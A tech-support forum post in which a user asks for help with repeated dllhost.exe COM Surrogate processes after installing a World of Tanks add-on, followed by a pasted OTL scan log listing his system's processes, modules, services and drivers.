Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

Yet another dllhost.exe *32 COM Surrogate Post [Solved]


  • This topic is locked This topic is locked

#1
glasgow3219

glasgow3219

    Member

  • Member
  • PipPip
  • 13 posts

Good day,

 

This weekend I downloaded a 3rd party application, WoTNumbers, for the game World of Tanks and have since been having trouble with dllhost.exe *32 COM Surrogate slowing the computer and filling up the task manager processes list.  I tried AVG 2014 but it was unable to remove.  I have not tried anything else.  The OTL log is posted below.

 

Any help would be appreciated.

 

Thanks,

 

Joe

 

OTL logfile created on: 11/2/2014 3:52:08 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Joe\Downloads
64bit- Professional Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17358)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
15.92 Gb Total Physical Memory | 8.55 Gb Available Physical Memory | 53.72% Memory free
31.83 Gb Paging File | 23.58 Gb Available in Paging File | 74.10% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 119.14 Gb Total Space | 10.87 Gb Free Space | 9.12% Space Free | Partition Type: NTFS
Drive D: | 465.76 Gb Total Space | 387.52 Gb Free Space | 83.20% Space Free | Partition Type: NTFS
Drive E: | 4.36 Gb Total Space | 0.00 Gb Free Space | 0.00% Space Free | Partition Type: CDFS
 
Computer Name: JOE-PC | User Name: Joe | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2014/11/02 15:50:52 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Joe\Downloads\OTL.exe
PRC - [2014/10/21 12:22:40 | 001,529,536 | ---- | M] (Valve Corporation) -- C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
PRC - [2014/10/21 12:22:40 | 000,833,728 | ---- | M] (Valve Corporation) -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe
PRC - [2014/10/21 12:22:38 | 001,938,624 | ---- | M] (Valve Corporation) -- C:\Program Files (x86)\Steam\Steam.exe
PRC - [2014/10/17 11:24:56 | 000,045,840 | ---- | M] (Raptr, Inc) -- C:\Program Files (x86)\Raptr\raptr_im.exe
PRC - [2014/10/17 11:24:54 | 000,066,832 | ---- | M] (Raptr, Inc) -- C:\Program Files (x86)\Raptr\raptr.exe
PRC - [2014/10/06 19:54:03 | 000,810,680 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Internet Explorer\iexplore.exe
PRC - [2014/09/19 21:24:41 | 003,600,216 | ---- | M] (Electronic Arts) -- C:\Program Files (x86)\Origin\Origin.exe
PRC - [2014/09/05 16:34:22 | 003,364,368 | ---- | M] (AVG Technologies CZ, s.r.o.) -- C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
PRC - [2014/09/05 16:29:52 | 003,593,744 | ---- | M] (AVG Technologies CZ, s.r.o.) -- C:\Program Files (x86)\AVG\AVG2015\avgui.exe
PRC - [2014/09/05 16:23:18 | 000,293,448 | ---- | M] (AVG Technologies CZ, s.r.o.) -- C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
PRC - [2014/08/13 11:11:10 | 000,076,888 | ---- | M] () -- C:\Windows\SysWOW64\PnkBstrA.exe
PRC - [2013/07/25 11:19:26 | 005,624,784 | ---- | M] (Safer-Networking Ltd.) -- C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
PRC - [2013/06/05 09:52:10 | 001,780,736 | ---- | M] (Corsair Components  Inc) -- C:\Program Files (x86)\Corsair\K90 Keyboard\K90Hid.exe
PRC - [2013/05/16 10:56:34 | 001,033,688 | ---- | M] (Safer-Networking Ltd.) -- C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
PRC - [2013/05/16 10:56:30 | 001,817,560 | ---- | M] (Safer-Networking Ltd.) -- C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
PRC - [2013/05/15 13:21:32 | 000,171,928 | ---- | M] (Safer-Networking Ltd.) -- C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
PRC - [2012/10/31 09:16:14 | 000,143,360 | ---- | M] (Brother Industries, Ltd.) -- C:\Program Files (x86)\Brother\Brmfcmon\BrMfimon.exe
PRC - [2012/09/23 20:43:34 | 000,065,192 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2012/08/09 02:09:28 | 000,166,720 | R--- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
PRC - [2012/08/07 17:42:32 | 000,007,168 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology enterprise\IAStorDataMgrSvc.exe
PRC - [2012/08/07 17:42:26 | 000,286,720 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology enterprise\IAStorIcon.exe
PRC - [2012/04/16 19:32:26 | 000,251,392 | ---- | M] (Corsair Components  Inc) -- C:\Program Files (x86)\Corsair\K90 Keyboard\CorsTra.exe
PRC - [2011/09/20 09:17:44 | 000,115,048 | ---- | M] (Renesas Electronics Corporation) -- C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\rusb3mon.exe
PRC - [2009/11/06 14:36:32 | 002,469,888 | ---- | M] () -- C:\Program Files (x86)\NETGEAR\WG111v3\WG111v3.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/10/21 12:22:58 | 002,226,880 | ---- | M] () -- C:\Program Files (x86)\Steam\video.dll
MOD - [2014/10/21 12:22:40 | 000,682,176 | ---- | M] () -- C:\Program Files (x86)\Steam\bin\chromehtml.dll
MOD - [2014/10/20 03:12:02 | 001,075,712 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\712706124a1696dc89409b91cc6612f3\System.ServiceModel.Web.ni.dll
MOD - [2014/10/20 03:11:30 | 002,959,360 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\87cbe90290875cdd53398d6a4332ccdb\System.IdentityModel.ni.dll
MOD - [2014/10/20 03:11:28 | 019,543,552 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\1e967f3f498d321e24eca904451135bf\System.ServiceModel.ni.dll
MOD - [2014/10/20 03:11:20 | 000,029,696 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\IAStorDataMcfeeca6f#\c298677e5ca00c8a0a03f12751e48751\IAStorDataMgrSvcInterfaces.ni.dll
MOD - [2014/10/20 03:11:18 | 000,294,912 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\IAStorUtil\f18dd78c5bb3b29cda0ddc45342ddddf\IAStorUtil.ni.dll
MOD - [2014/10/20 03:03:40 | 012,700,160 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\a70a1ccafde9479118a0e853a36ffc46\System.Windows.Forms.ni.dll
MOD - [2014/10/20 03:03:37 | 007,573,504 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b464b97b2945296b1514b2ba6ed0d638\System.Xml.ni.dll
MOD - [2014/10/20 03:03:37 | 006,998,016 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\41625dd004f6d552ab6cdaa9ebead550\System.Core.ni.dll
MOD - [2014/10/20 03:03:35 | 002,786,304 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\30e5600ec60648ec4b086b99693b0007\System.Runtime.Serialization.ni.dll
MOD - [2014/10/20 03:03:34 | 001,631,744 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\167f222e5618ad96480436aef5596c94\System.Drawing.ni.dll
MOD - [2014/10/20 03:03:34 | 000,964,096 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\d6bb4ac8b2247be8075144fff90588a1\System.Configuration.ni.dll
MOD - [2014/10/20 03:03:33 | 009,987,584 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System\cbc172b78a73dab7e43941e315608fec\System.ni.dll
MOD - [2014/10/20 03:03:33 | 000,792,064 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\62b0ebc9c6d08146aeeac431e8f605d3\System.ServiceModel.Internals.ni.dll
MOD - [2014/10/20 03:03:33 | 000,121,856 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\943a93a61dad90405369b57e4f096d83\SMDiagnostics.ni.dll
MOD - [2014/10/15 14:44:26 | 002,407,168 | ---- | M] () -- C:\Program Files (x86)\Raptr\ltc_host_ex.dll
MOD - [2014/10/01 16:16:02 | 000,774,656 | ---- | M] () -- C:\Program Files (x86)\Steam\SDL2.dll
MOD - [2014/09/19 21:24:41 | 000,962,560 | ---- | M] () -- C:\Program Files (x86)\Origin\platforms\qwindows.dll
MOD - [2014/09/19 21:24:40 | 000,302,592 | ---- | M] () -- C:\Program Files (x86)\Origin\imageformats\qtiff.dll
MOD - [2014/09/19 21:24:40 | 000,261,632 | ---- | M] () -- C:\Program Files (x86)\Origin\imageformats\qmng.dll
MOD - [2014/09/19 21:24:40 | 000,217,088 | ---- | M] () -- C:\Program Files (x86)\Origin\imageformats\qjpeg.dll
MOD - [2014/09/19 21:24:40 | 000,025,088 | ---- | M] () -- C:\Program Files (x86)\Origin\imageformats\qico.dll
MOD - [2014/09/19 21:24:40 | 000,024,064 | ---- | M] () -- C:\Program Files (x86)\Origin\imageformats\qgif.dll
MOD - [2014/09/19 21:24:40 | 000,019,968 | ---- | M] () -- C:\Program Files (x86)\Origin\imageformats\qtga.dll
MOD - [2014/09/19 21:24:40 | 000,018,944 | ---- | M] () -- C:\Program Files (x86)\Origin\imageformats\qwbmp.dll
MOD - [2014/09/04 16:29:26 | 034,589,376 | ---- | M] () -- C:\Program Files (x86)\Steam\bin\libcef.dll
MOD - [2014/09/04 16:29:26 | 000,837,824 | ---- | M] () -- C:\Program Files (x86)\Steam\bin\ffmpegsumo.dll
MOD - [2014/08/21 11:15:22 | 001,171,456 | ---- | M] () -- C:\Program Files (x86)\Steam\libavcodec-56.dll
MOD - [2014/08/21 11:15:22 | 000,485,888 | ---- | M] () -- C:\Program Files (x86)\Steam\libswscale-3.dll
MOD - [2014/08/21 11:15:22 | 000,442,368 | ---- | M] () -- C:\Program Files (x86)\Steam\libavutil-54.dll
MOD - [2014/08/21 11:15:22 | 000,403,968 | ---- | M] () -- C:\Program Files (x86)\Steam\libavformat-56.dll
MOD - [2014/08/21 11:15:22 | 000,332,800 | ---- | M] () -- C:\Program Files (x86)\Steam\libavresample-2.dll
MOD - [2014/06/17 17:56:00 | 002,717,595 | ---- | M] () -- C:\Program Files (x86)\Raptr\heliotrope._purple.pyd
MOD - [2014/05/13 16:26:54 | 001,662,464 | ---- | M] () -- C:\Program Files (x86)\Raptr\PyQt4.QtCore.pyd
MOD - [2014/05/13 16:26:54 | 000,494,592 | ---- | M] () -- C:\Program Files (x86)\Raptr\PyQt4.QtNetwork.pyd
MOD - [2014/05/13 16:26:52 | 005,812,736 | ---- | M] () -- C:\Program Files (x86)\Raptr\PyQt4.QtGui.pyd
MOD - [2014/05/13 16:26:52 | 000,313,856 | ---- | M] () -- C:\Program Files (x86)\Raptr\PyQt4.QtWebKit.pyd
MOD - [2014/05/13 16:26:40 | 000,067,584 | ---- | M] () -- C:\Program Files (x86)\Raptr\sip.pyd
MOD - [2014/04/20 03:07:29 | 000,025,600 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\IAStorCommon\f71244577f9ac900b0e71c10505c4f4d\IAStorCommon.ni.dll
MOD - [2014/04/20 03:04:48 | 016,546,816 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\d12f4fda3d1bfabf888342e96983e9a7\mscorlib.ni.dll
MOD - [2013/11/20 17:05:26 | 000,256,000 | ---- | M] () -- C:\Program Files (x86)\Raptr\amd_ags.dll
MOD - [2013/05/16 10:55:26 | 000,113,496 | ---- | M] () -- C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
MOD - [2013/05/16 10:55:24 | 000,416,600 | ---- | M] () -- C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
MOD - [2013/05/09 16:52:58 | 001,183,699 | ---- | M] () -- C:\Program Files (x86)\Raptr\liboscar.dll
MOD - [2013/05/09 16:52:58 | 000,483,306 | ---- | M] () -- C:\Program Files (x86)\Raptr\plugins\libicq.dll
MOD - [2013/05/09 16:52:56 | 000,495,680 | ---- | M] () -- C:\Program Files (x86)\Raptr\plugins\libaim.dll
MOD - [2013/05/03 11:57:16 | 001,640,221 | ---- | M] () -- C:\Program Files (x86)\Raptr\libjabber.dll
MOD - [2013/05/03 11:57:14 | 001,053,730 | ---- | M] () -- C:\Program Files (x86)\Raptr\libymsg.dll
MOD - [2013/05/03 11:57:06 | 000,655,356 | ---- | M] () -- C:\Program Files (x86)\Raptr\plugins\libirc.dll
MOD - [2013/05/03 11:57:04 | 000,603,326 | ---- | M] () -- C:\Program Files (x86)\Raptr\plugins\ssl-nss.dll
MOD - [2013/05/03 11:57:02 | 000,474,199 | ---- | M] () -- C:\Program Files (x86)\Raptr\plugins\ssl.dll
MOD - [2013/05/03 11:57:00 | 000,497,782 | ---- | M] () -- C:\Program Files (x86)\Raptr\plugins\libyahoojp.dll
MOD - [2013/05/03 11:56:50 | 001,306,387 | ---- | M] () -- C:\Program Files (x86)\Raptr\plugins\libmsn.dll
MOD - [2013/05/03 11:56:46 | 000,565,461 | ---- | M] () -- C:\Program Files (x86)\Raptr\plugins\libxmpp.dll
MOD - [2013/05/03 11:56:44 | 000,506,276 | ---- | M] () -- C:\Program Files (x86)\Raptr\plugins\libyahoo.dll
MOD - [2012/05/14 12:39:24 | 000,043,008 | ---- | M] () -- C:\Program Files (x86)\Corsair\K90 Keyboard\hidGetKey.dll
MOD - [2011/02/15 11:17:28 | 001,213,633 | ---- | M] () -- C:\Program Files (x86)\Raptr\libxml2-2.dll
MOD - [2011/02/15 11:17:28 | 000,417,501 | ---- | M] () -- C:\Program Files (x86)\Raptr\sqlite3.dll
MOD - [2010/11/22 16:06:22 | 000,055,808 | ---- | M] () -- C:\Program Files (x86)\Raptr\zlib1.dll
MOD - [2010/11/22 15:57:34 | 000,167,936 | ---- | M] () -- C:\Program Files (x86)\Raptr\win32gui.pyd
MOD - [2010/11/22 15:57:34 | 000,111,104 | ---- | M] () -- C:\Program Files (x86)\Raptr\win32file.pyd
MOD - [2010/11/22 15:57:34 | 000,096,256 | ---- | M] () -- C:\Program Files (x86)\Raptr\win32api.pyd
MOD - [2010/11/22 15:57:34 | 000,036,352 | ---- | M] () -- C:\Program Files (x86)\Raptr\win32process.pyd
MOD - [2010/11/22 15:57:34 | 000,016,384 | ---- | M] () -- C:\Program Files (x86)\Raptr\win32trace.pyd
MOD - [2010/11/22 15:57:18 | 000,141,312 | ---- | M] () -- C:\Program Files (x86)\Raptr\gobject._gobject.pyd
MOD - [2010/11/22 15:57:06 | 000,263,168 | ---- | M] () -- C:\Program Files (x86)\Raptr\win32com.shell.shell.pyd
MOD - [2010/11/22 15:56:56 | 000,354,304 | ---- | M] () -- C:\Program Files (x86)\Raptr\pythoncom26.dll
MOD - [2010/11/22 15:56:56 | 000,110,592 | ---- | M] () -- C:\Program Files (x86)\Raptr\pywintypes26.dll
MOD - [2010/11/22 15:56:26 | 000,324,608 | ---- | M] () -- C:\Program Files (x86)\Raptr\PIL._imaging.pyd
MOD - [2010/11/22 15:56:02 | 000,805,376 | ---- | M] () -- C:\Program Files (x86)\Raptr\_ssl.pyd
MOD - [2010/11/22 15:56:02 | 000,583,680 | ---- | M] () -- C:\Program Files (x86)\Raptr\unicodedata.pyd
MOD - [2010/11/22 15:56:02 | 000,356,864 | ---- | M] () -- C:\Program Files (x86)\Raptr\_hashlib.pyd
MOD - [2010/11/22 15:56:02 | 000,127,488 | ---- | M] () -- C:\Program Files (x86)\Raptr\pyexpat.pyd
MOD - [2010/11/22 15:56:02 | 000,087,040 | ---- | M] () -- C:\Program Files (x86)\Raptr\_ctypes.pyd
MOD - [2010/11/22 15:56:02 | 000,044,544 | ---- | M] () -- C:\Program Files (x86)\Raptr\_sqlite3.pyd
MOD - [2010/11/22 15:56:02 | 000,043,008 | ---- | M] () -- C:\Program Files (x86)\Raptr\_socket.pyd
MOD - [2010/11/22 15:56:02 | 000,010,240 | ---- | M] () -- C:\Program Files (x86)\Raptr\select.pyd
MOD - [2010/11/22 15:56:02 | 000,009,216 | ---- | M] () -- C:\Program Files (x86)\Raptr\winsound.pyd
MOD - [2009/11/06 14:36:32 | 002,469,888 | ---- | M] () -- C:\Program Files (x86)\NETGEAR\WG111v3\WG111v3.exe
MOD - [2009/03/04 09:52:36 | 000,372,736 | ---- | M] () -- C:\Program Files (x86)\NETGEAR\WG111v3\WlanDll.dll
MOD - [2009/02/27 16:38:20 | 000,139,264 | R--- | M] () -- C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
MOD - [2008/12/29 17:13:24 | 000,204,800 | ---- | M] () -- C:\Program Files (x86)\NETGEAR\WG111v3\KJLog.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2014/09/18 18:25:49 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2014/09/15 15:03:18 | 000,239,616 | ---- | M] (AMD) [Auto | Running] -- C:\Windows\SysNative\atiesrxx.exe -- (AMD External Events Utility)
SRV:64bit: - [2014/08/16 16:44:39 | 000,076,152 | ---- | M] () [Auto | Running] -- C:\Windows\SysNative\PnkBstrA.exe -- (PnkBstrA)
SRV:64bit: - [2014/04/09 06:13:48 | 000,289,256 | ---- | M] (McAfee, Inc.) [On_Demand | Stopped] -- C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe -- (McComponentHostService)
SRV:64bit: - [2013/05/26 22:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2012/07/27 10:54:18 | 000,636,952 | ---- | M] (Intel® Corporation) [Auto | Running] -- C:\Program Files\Intel\iCLS Client\HeciServer.exe -- (Intel®
SRV:64bit: - [2012/06/05 17:40:38 | 000,190,824 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Windows\SysNative\IPROSetMonitor.exe -- (Intel®
SRV:64bit: - [2009/07/13 18:40:01 | 000,193,536 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\appmgmts.dll -- (AppMgmt)
SRV - [2014/10/21 12:22:40 | 000,833,728 | ---- | M] (Valve Corporation) [On_Demand | Running] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014/09/23 21:49:05 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/09/05 16:34:22 | 003,364,368 | ---- | M] (AVG Technologies CZ, s.r.o.) [Auto | Running] -- C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe -- (AVGIDSAgent)
SRV - [2014/09/05 16:23:18 | 000,293,448 | ---- | M] (AVG Technologies CZ, s.r.o.) [Auto | Running] -- C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe -- (avgwd)
SRV - [2014/08/13 11:11:10 | 000,076,888 | ---- | M] () [Auto | Running] -- C:\Windows\SysWOW64\PnkBstrA.exe -- (PnkBstrA)
SRV - [2014/03/20 15:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2012/09/23 20:43:34 | 000,065,192 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2012/08/09 02:09:28 | 000,166,720 | R--- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe -- (jhi_service)
SRV - [2012/08/07 17:42:32 | 000,007,168 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology enterprise\IAStorDataMgrSvc.exe -- (IAStorDataMgrSvc)
SRV - [2012/07/09 00:40:10 | 000,104,912 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2011/03/01 18:29:58 | 000,130,976 | ---- | M] (Futuremark Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Futuremark Shared\Futuremark SystemInfo\FMSISvc.exe -- (Futuremark SystemInfo Service)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2014/09/15 15:26:58 | 016,750,080 | ---- | M] (Advanced Micro Devices, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\atikmdag.sys -- (atikmdag)
DRV:64bit: - [2014/09/15 15:26:58 | 016,750,080 | ---- | M] (Advanced Micro Devices, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\atikmdag.sys -- (amdkmdag)
DRV:64bit: - [2014/09/15 14:59:06 | 000,576,000 | ---- | M] (Advanced Micro Devices, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\atikmpag.sys -- (amdkmdap)
DRV:64bit: - [2014/08/20 21:45:10 | 000,243,480 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | System | Running] -- C:\Windows\SysNative\drivers\avgldx64.sys -- (Avgldx64)
DRV:64bit: - [2014/08/06 21:39:52 | 000,123,672 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\avgmfx64.sys -- (Avgmfx64)
DRV:64bit: - [2014/07/24 14:06:36 | 000,247,576 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | System | Running] -- C:\Windows\SysNative\drivers\avgidsdrivera.sys -- (AVGIDSDriver)
DRV:64bit: - [2014/07/18 15:53:26 | 000,313,624 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\avgloga.sys -- (Avgloga)
DRV:64bit: - [2014/07/02 09:58:24 | 000,270,616 | ---- | M] (AVG Technologies CZ, s.r.o.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\avgtdia.sys -- (Avgtdia)
DRV:64bit: - [2014/06/21 10:01:22 | 000,094,720 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\AtihdW76.sys -- (AtiHDAudioService)
DRV:64bit: - [2014/06/18 21:03:34 | 000,190,744 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\avgidsha.sys -- (AVGIDSHA)
DRV:64bit: - [2014/06/18 21:03:34 | 000,153,368 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | System | Running] -- C:\Windows\SysNative\drivers\avgdiska.sys -- (Avgdiska)
DRV:64bit: - [2014/06/18 21:03:20 | 000,031,512 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\avgrkx64.sys -- (Avgrkx64)
DRV:64bit: - [2013/01/17 12:15:12 | 000,066,800 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LGSHidFilt.Sys -- (LGSHidFilt)
DRV:64bit: - [2012/08/27 19:51:00 | 000,230,280 | ---- | M] (Renesas Electronics Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\rusb3xhc.sys -- (rusb3xhc)
DRV:64bit: - [2012/08/27 19:50:58 | 000,114,568 | ---- | M] (Renesas Electronics Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\rusb3hub.sys -- (rusb3hub)
DRV:64bit: - [2012/08/07 17:45:40 | 000,575,448 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorA.sys -- (iaStorA)
DRV:64bit: - [2012/08/07 17:45:40 | 000,026,072 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorF.sys -- (iaStorF)
DRV:64bit: - [2012/07/12 04:56:32 | 000,062,784 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:64bit: - [2012/03/27 10:58:46 | 000,025,600 | ---- | M] ( ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\CORSGKB.sys -- (CORSGKB)
DRV:64bit: - [2012/03/15 05:57:30 | 000,514,736 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\e1c62x64.sys -- (e1cexpress)
DRV:64bit: - [2012/02/29 23:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2010/11/20 20:24:33 | 000,059,392 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2010/11/20 20:23:48 | 000,071,168 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:64bit: - [2010/11/20 20:23:47 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2010/11/20 20:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/11/20 20:23:47 | 000,031,232 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2010/11/20 20:23:47 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2009/11/23 17:38:00 | 000,016,008 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LGVirHid.sys -- (LGVirHid)
DRV:64bit: - [2009/11/23 17:37:50 | 000,022,408 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LGBusEnum.sys -- (LGBusEnum)
DRV:64bit: - [2009/11/18 17:47:46 | 000,446,976 | ---- | M] (NETGEAR Inc.                           ) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wg111v3.sys -- (RTL8187B)
DRV:64bit: - [2009/11/17 16:12:00 | 000,032,344 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\MBfilt64.sys -- (MBfilt)
DRV:64bit: - [2009/07/13 18:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/13 18:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/13 18:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/07/13 17:35:32 | 000,012,288 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\serscan.sys -- (StillCam)
DRV:64bit: - [2009/06/10 13:35:42 | 000,187,392 | ---- | M] (Realtek Corporation                                            ) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:64bit: - [2009/06/10 13:35:33 | 000,389,120 | ---- | M] (Marvell) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\yk62x64.sys -- (yukonw7)
DRV:64bit: - [2009/06/10 13:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
